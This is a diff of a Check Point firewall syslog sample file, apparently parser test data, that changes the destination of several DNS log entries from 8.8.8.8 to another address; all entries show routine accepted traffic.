FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T17:31:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80db8f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"65136"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T17:31:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80db8f,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"48170"; 
service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10080"; xlatesrc:"0.0.0.0"] 
@@ -3053,7 +3053,7 @@
 <134>1 2020-03-29T17:36:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dc80,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"34986"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10092"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:36:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dc80,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40626"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:36:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dc81,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T17:36:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dc85,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36798"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T17:36:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dc85,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36798"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:36:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dc85,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"62996"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10093"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:36:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dc85,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"63383"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:36:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dc85,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37930"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10094"; xlatesrc:"0.0.0.0"]
@@ -3070,7 +3070,7 @@
 <134>1 2020-03-29T17:38:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dcfe,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49459"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:38:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dd00,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:38:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dd01,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T17:38:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dd03,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50935"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T17:38:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dd03,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50935"; service:"53"; service_id:"domain-udp"; 
src:"192.168.1.100"]
 <134>1 2020-03-29T17:38:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dd03,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2.21.41.118"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"33270"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10095"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:38:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dd03,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59845"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:38:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dd03,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; 
__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50366"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10096"; xlatesrc:"0.0.0.0"] 
@@ -3106,90 +3106,90 @@
 <134>1 2020-03-29T17:41:32Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddcc,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.1"; log_delay:"1585503692"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32982"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:41:32Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddcc,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"129.250.35.250"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50175"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:41:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddcf,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.123"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34591"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddec,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33482"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddec,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503724"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44801"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddec,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503724"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49981"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddec,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503724"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32993"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddec,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503724"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38377"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddec,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503724"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34858"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddec,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33482"; service:"53"; service_id:"domain-udp"; 
src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddec,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503724"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44801"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
